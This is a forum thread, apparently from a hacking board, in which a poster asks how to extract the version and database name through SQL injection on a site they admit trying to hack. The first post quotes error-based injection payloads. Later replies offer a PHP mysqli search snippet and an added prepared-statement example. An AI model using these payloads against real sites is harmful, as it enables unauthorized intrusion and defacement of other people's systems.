Closed Sql injection

Status
Not open for further replies.

Destroyers

Please help me, sir.
The site has only one column.
When I put union all select or union select 1 it showed:

lg.php

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 419

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/cc1916/public_html/www3/apps/frontend/offres/offre.php on line 440

When I put
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

or
+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

It's the same output.
I can't get the version and database.
Please, how do I get the version and database?
Please comment the command. Ty.
 
I think the database it uses is an older version, which is why it behaves like that, or maybe you're confused about how many columns it really has.
 
The mysql you're using is deprecated. Change all your queries to mysqli.

Teach me, sir. I don't know how to use mysqli in a website.
I don't know where I'm going to put this.
<?php
// Search the entries table; $connect is an open mysqli connection.
function doSearch($connect) {
    $output = '';
    if (isset($_POST['search'])) {
        $searchq = $_POST['search'];
        // Keep only letters and digits before the value is placed in the SQL string.
        $searchq = preg_replace("#[^0-9a-z]#i", "", $searchq);
        $sql = "SELECT * FROM entries WHERE name LIKE '%$searchq%' or description LIKE '%$searchq%' or content LIKE '%$searchq%'";
        $query = mysqli_query($connect, $sql);
        $count = mysqli_num_rows($query);
        if ($count == 0) {
            $output = '<tr><td>No results found.</td></tr>';
        } else {
            while ($row = mysqli_fetch_array($query)) {
                // Escape database values before writing them into the HTML.
                $eName = htmlspecialchars($row['name']);
                $eDesc = htmlspecialchars($row['description']);
                $eCont = htmlspecialchars($row['content']);
                $id = htmlspecialchars($row['id']);
                $elvl = htmlspecialchars($row['level']);
                $ehp = htmlspecialchars($row['hp']);

                $output .= '<tr><td><a href="You do not have permission to view the full content of this post. Log in or register now.' .$id. '" onclick="document.linkform.submit();">'.$eName.'</a></td><td>'.$eDesc.'</td><td>'.$elvl.'</td><td>'.$ehp.'</td></tr>';
            }
        }
    }
    // Return the rows (or an empty string when no search was submitted).
    return $output;
}
That's just an example.
 
Because that code of yours is only for filtering.
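
An added example, not code from any poster in the thread: the same search written with a mysqli prepared statement, so the search term is bound as data instead of being filtered and concatenated into the SQL string. Query failures become exceptions that are logged rather than echoed, unlike the `mysql_fetch_array()` warnings quoted in the first post, which disclose the script's path. The `entries` table and its columns come from the snippet in the thread; the connection values and the `h()` helper are assumptions.

```php
<?php
// Added example (not from the thread). Connection values are placeholders.
// Make mysqli throw exceptions instead of returning false and emitting warnings.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Hypothetical helper: HTML-escape a value before it is written into the page.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function doSearch(mysqli $db, string $term): string {
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = '%' . addcslashes($term, '%_\\') . '%';
    $stmt = $db->prepare(
        'SELECT id, name, description, level, hp FROM entries
         WHERE name LIKE ? OR description LIKE ? OR content LIKE ?'
    );
    // The three placeholders are sent as string parameters, never as SQL text.
    $stmt->bind_param('sss', $like, $like, $like);
    $stmt->execute();
    $result = $stmt->get_result(); // available with the mysqlnd driver

    $rows = '';
    while ($row = $result->fetch_assoc()) {
        $rows .= '<tr><td>' . h((string) $row['name'])
               . '</td><td>' . h((string) $row['description'])
               . '</td><td>' . h((string) $row['level'])
               . '</td><td>' . h((string) $row['hp']) . '</td></tr>';
    }
    $stmt->close();
    return $rows !== '' ? $rows : '<tr><td colspan="4">No results found.</td></tr>';
}

try {
    $db = new mysqli('localhost', 'app_user', 'CHANGE_ME', 'app_db'); // placeholders
    $db->set_charset('utf8mb4');
    // Accept only a plain string; an array-valued parameter is treated as empty.
    $term = is_string($_POST['search'] ?? null) ? $_POST['search'] : '';
    echo '<table>' . doSearch($db, $term) . '</table>';
} catch (mysqli_sql_exception $e) {
    // Log the detail server-side; the visitor sees no query text or file path.
    error_log($e->getMessage());
    http_response_code(500);
    echo 'Search is temporarily unavailable.';
}
```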
 
That's hard, especially if you're hacking big sites; those have security features.

So many people have already hacked the website I'm trying to hack.
I just find it funny because they're fighting over it. Every day the defaced page is different.
So I tried it, but it won't work. I can't do it. I was hoping to get help! Because the other sites I've encountered are just the same as that one. So if I find out how, the command is probably the same for the others.

kira111101, your name seems familiar. Are you COD3X?
 